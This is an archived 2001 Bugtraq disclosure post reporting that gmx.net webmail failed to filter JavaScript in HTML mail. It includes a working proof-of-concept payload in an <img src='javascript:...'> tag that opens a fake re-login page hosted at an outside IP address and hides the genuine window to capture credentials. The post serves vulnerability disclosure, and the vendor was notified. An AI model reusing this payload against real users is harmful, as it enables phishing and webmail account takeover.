[20966] in bugtraq
gmx.net
daemon@ATHENA.MIT.EDU (rudi carell)
Mon Jun 11 14:46:57 2001
From: "rudi carell" <rudicarell@hotmail.com>
To: BUGTRAQ@securityfocus.com
Cc: security@gmx.net
Date: Mon, 11 Jun 2001 09:31:04
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F47VXfEFzotSkrpEwwS000162e7@hotmail.com>
good morning buqtraq,
gmx.net is a european-based free web-mail-, web-community system comparable
with hotmail.com.
like many other web-mail systems gmx.net has a problem filtering java-script
in html-based mail-messages.
this enables an attacker to create html-messages with malicious java-script
embedded.
problem description:
the html - <img> tag can be used to embedd malicious
java-scripts within html-mails
once the "html-mailpart" is opened by the gmx-user it is possible
the "embedded" java-script is executed by the web-browser(if enabled:-) this
makes it possible to place trojans and execute URL-based webmail-commands
leading to a compromise of the users webmail-account.
sample with "classic" relogin-trojan:
---cut here---
<html><body> <img src="javascript:
gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
<h4>mungo baby</h4></body></html>
---cut here---
.. not very sophisticated but working... changing user-options would be more
elaborate ..
nice day,
rc
rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com
vendor status: mail has been sent to security@gmx.net
RC-EOF
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
